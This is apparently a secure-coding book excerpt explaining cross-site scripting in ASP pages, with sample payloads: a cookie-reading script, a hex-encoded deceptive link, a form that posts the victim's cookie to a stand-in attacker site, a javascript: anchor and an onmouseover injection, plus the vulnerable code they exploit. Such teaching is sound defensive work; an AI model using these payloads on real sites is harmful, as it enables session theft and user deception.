Cross-Site Scripting: When Output Turns Bad

I often hear people say that cross-site scripting (XSS) issues are the most difficult attacks to explain to end users and yet they are among the easiest to exploit. I think what makes them hard to understand is the nature of the attack: the client is compromised because of a flaw in one or more Web pages. About three years ago, no one had heard of cross-site scripting issues, but now I think it's safe to say we hear of at least one or two issues per day on the Web. So, what is the problem and why is it serious? The problem is twofold:

A Web site trusts input from an external, untrusted entity.
The Web site displays said input as output.

I bet you've seen ASP code like this before:

Hello, &nbsp; <% Response.Write(Request.Querystring("name")) %>

This code will write out to the browser whatever is in the name field in the QueryString for example, www.contoso.com/req.asp?name=Blake. That seems okay, but what if an attacker can convince a user to click on this link, for example on a Web page, a newsgroup or an e-mail message? That doesn't seem like a big deal, until you realize that an attacker could have the unsuspecting user click on the link in this code:

<a href=www.contoso.com/req.asp?name=scriptcode> Click here to win $1,000,000</a>

where the scriptcode block is this:

<script>x=document.cookie;alert(x);</script>

Note that the payload normally would not look like this it's too easy for the victim to realize that something is amiss, instead, the attacker will encode most of the payload to yield this:

<a href="http://www.microsoft.com@%77%77%77%2E%65%78%70%6C%6F%72%61%74%69 %6F%6E%61%69%72%2E%63%6F%6D%2F%72%65%71%2E%61%73%70%3F%6E%61%6D%65%3D%3C %73%63%72%69%70%74%3E%78%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B %61%6C%65%72%74%28%78%29%3B%3C%2F%73%63%72%69%70%74%3E"> Click here to win $1,000,000</a>

Notice two aspects about this. First, the link looks like it goes to www.microsoft.com, but it does not! It uses a little-known, but valid, URL format: http://username:password@webserver. This is defined in RFC 1738, Uniform Resource Locators (URL), at ftp://ftp.isi.edu/in-notes/rfc1738.txt. The most relevant text, from 3.1. Common Internet Scheme Syntax, reads like this:

While the syntax for the rest of the URL may vary depending on the particular scheme selected, URL schemes that involve the direct use of an IP-based protocol to a specified host on the Internet use a common syntax for the scheme-specific data: //<user>:<password>@<host>:<port>/<url-path>.

Note that each part of the URL is optional. Now look at the URL again: the www.microsoft.com reference is bogus. It's not the real URL whatsoever. It's a username, followed by the real Web site name, and it is hex-encoded to make it harder for the victim to determine what the real request is for!

OK, back to the XSS issue. The problem is the name parameter it's not a name, but rather HTML and JavaScript, which could be used to access user data, such as the user's cookie through the document.cookie object. As you may know, cookies are tied to a domain; for example, a cookie in the contoso.com domain can be accessed only by Web pages in that domain. For example, a Web page in the microsoft.com domain cannot access a cookie in the contoso.com domain. Now think for a moment; when the user clicks the link above, in what domain does the script code execute? To answer this, simply ask yourself this question, Where did the page come from? The page came from the contoso.com domain, so it can access the cookie data in the contoso.com domain. The problem is that only one page in a domain needs to have this kind of flaw to render all data on a client computer tied to that domain insecure. This code does nothing more than display the cookie in the user's browser. Of course, an attacker can do more harm, but I'll cover that later.

Let me put this in perspective. In late 2001, a vulnerability was discovered in a Web page in the passport.com domain that had a very subtle flaw similar to the example above. By sending a Hotmail recipient a specially crafted e-mail, the attacker could cause script to execute in the passport.com domain because Hotmail is in the hotmail.passport.com domain. And this means the code could access the cookies generated by the Passport service used to authenticate the client. When the attacker replayed those cookies remember that a cookie is just a header in the HTTP request he could spoof the e-mail recipient and access data that only that recipient could normally access.

Through cross-site scripting attacks, cookies can be read or changed. This is also called poisoning; browser plug-ins or native code tied to a domain (for example, using the SiteLock ActiveX template, discussed in Chapter 16, Securing RPC, ActiveX Controls, and DCOM ) can be instantiated and scripted with untrusted data and user input can be intercepted. In short, the attacker has unfettered access to the browser's object model in the security context of the compromised domain.

A more insidious attack is Web server spoofing. Imagine that a news site has an XSS flaw. Using that flaw, the attacker has full access to the object model in the security context of the news site, so if the attacker can get a victim to navigate to the Web site, he can display a news article that comes from the attacker's site yet appears to originate from the news site's Web server.

Figure 13-1 should help outline the attack.

figure 13-1 how xss attacks work.

Figure 13-1. How XSS attacks work.

More Info
The real reason XSS issues exist is because data and code are mixed together. Refer to Don't Mix Code and Data in Chapter 3, Security Principles to Live By, for more detail about this insecure design issue.

Any Web browser supporting scripting is potentially vulnerable. Furthermore, data gathered by the malicious script can be sent back to the attacker's Web site. For example, if the script has used the Dynamic HTML (DHTML) object model to extract data from a page, a cross-site scripting attack can send the data to the attacker. Look at this example to see what I mean:

<a href=http://www.contoso.com/req.asp?name= <FORM action=http://www.badsite-sample-13.com/data.asp method=post > <INPUT name="cookie" type="hidden"> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT> > Click here! </a>

Note that normally this HTML code is escaped; I just broke it out in an unescaped form to make it readable. When the user clicks the link, the user's cookie is sent to another Web site.

IMPORTANT
Using SSL/TLS does not mitigate cross-site scripting issues.

XSS attacks can be used against machines behind firewalls. Many corporate local area networks (LANs) are configured such that client machines trust servers on the LAN but do not trust servers on the outside Internet. However, a server outside a firewall can fool a client inside the firewall into believing that a trusted server inside the firewall has asked the client to execute a program. All the attacker needs is the name of a Web server inside the firewall that does not validate data in a Web page. (This Web server could be using a form field or querystring.) Finding such a server isn't easy unless the attacker has some inside knowledge, but it is possible.

XSS attacks can be persisted via cookies if an XSS bug exists in a site that outputs data from cookies onto a page. To pull this off, the attacker simply infects the cookie with malicious script, and each time the victim goes back to that site, the script in the cookie is displayed, the malicious code runs, and the attack is persistent until the user removes the cookie.

More Info
A wonderful explanation of XSS issues is also available in Cross-Site Scripting Overview at http://www.microsoft.com/technet/itsolutions/security/topics/csoverv.asp. And a great resource is the Open Web Application Security Project at http://www.owasp.org.

Sometimes the Attacker Doesn't Need a <SCRIPT> Block

Sometimes, the user-supplied data is inserted in a script block. In this case, it's not necessary for the attacker to include the <script> tag because it's already provided by the Web site developer. However, it does mean that the result must be valid script syntax.

You should be aware that <img src> and <a href> tags can also point to script code, not just a classic URL. For example, the following is a valid anchor:

<a href="javascript:alert(1);">Click here to win $1,000,000!</a>

No script block here!

The Attacker Doesn't Need the User to Click a Link!

I know you're thinking, But the user has to click a link to get this to happen. Luckily for the attackers, some attacks can be automated and require little or no user interaction. The easiest attack to pull off is when the input in the querystring, form, or some other data is used to build part of an HTML tag. For example, imagine the user's input builds this:

<a href=<%= request.querystring("url")%>>Click Here</a>

What's wrong with this? The attacker could provide the following in the URL variable in the querystring:

http://www.microsoft.com onmouseover="malicious-script"

This will add a mouseover event to the resulting HTML output. Now the user simply needs to move the mouse over the anchor text, and the exploit script will work. The more astute among you will realize that many tags can include onload or onactivate events. The attack could happen with no user interaction. Need I say more?